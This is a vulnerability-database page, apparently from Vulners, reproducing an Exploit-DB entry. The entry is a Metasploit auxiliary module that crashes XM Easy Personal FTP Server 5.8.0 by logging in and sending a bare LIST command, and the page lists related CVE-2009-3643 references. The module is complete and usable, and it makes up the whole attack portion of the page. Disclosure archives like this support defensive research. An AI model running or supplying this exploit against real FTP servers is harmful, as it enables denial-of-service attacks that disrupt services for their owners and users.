Lucene search
+L

XM Easy Personal FTP Server 5.8.0 - Denial of Service (Metasploit)

🗓️ 10 Nov 2009 00:00:00Reported by zhangmcType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

XM Easy Personal FTP Server 5.8.0 LIST DoS vulnerability exploi

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-3643
10 Nov 200900:00
circl
cve
CVE
CVE-2009-3643
9 Oct 200914:18
cve
cvelist
Cvelist
CVE-2009-3643
9 Oct 200914:18
cvelist
euvd
EUVD
EUVD-2009-3618
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-3643
9 Oct 200914:30
nvd
openvas
OpenVAS
XM Easy Personal FTP Server 'NLST' Command Remote Denial of Service Vulnerability
13 Nov 200900:00
openvas
openvas
OpenVAS
XM Easy Personal FTP Server 'LIST' And 'NLST' Command DoS Vulnerability
22 Oct 200900:00
openvas
prion
Prion
Command injection
9 Oct 200914:30
prion
# Exploit Title: XM Easy Personal FTP Server LIST DoS (Meta)
# Date: 4/17/2010
# Author: Jeremiah Talamantes
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe
# Version: 5.8.0
# Tested on: Windows XP, SP2
# CVE : N/A
# Code : http://www.redteamsecure.com/assets/company/exploits/xmftp/xmexploit.p

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

##
# xmeasy580_list.rb
#
# XM Easy Personal FTP Server 5.8.0 LIST DoS
#
# Tested on: Windows XP, SP2 (EN)
#
# Date tested: 4/17/2010
#
# First you must login to the FTP server in order to execute the DoS
# attack. This module exploits a weakness in the LIST command.
#
# Discovered by: Jeremiah Talamantes
# RedTeam Security
# http://www.redteamsecure.com
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Ftp
	include Msf::Auxiliary::Dos

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'XM Easy Personal FTP Server 5.8.0 LIST DoS',
			'Description'    => %q{
				This module exploits a DoS vulnerability in the LIST command
				in XM Easy Personal FTP Server 5.8.0. In order to execute this
				exploit, you must first login to the FTP server. This was only
				tested on Windows XP, SP2 (EN).
			},
			'Author'         => 'Jeremiah Talamantes (RedTeam Security)',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1234 $',
			'References'     => [
				[ 'URL', 'None' ]
			],
			'DisclosureDate' => 'Apr 17 2010')
		)

		# Required settings
		register_options([
			OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
			OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
		])
	end

	def run
		return unless connect_login

		raw_send("LIST \r\n")

		disconnect

		print_status("Check to see if the server is responding...")
	end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Nov 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.06351
37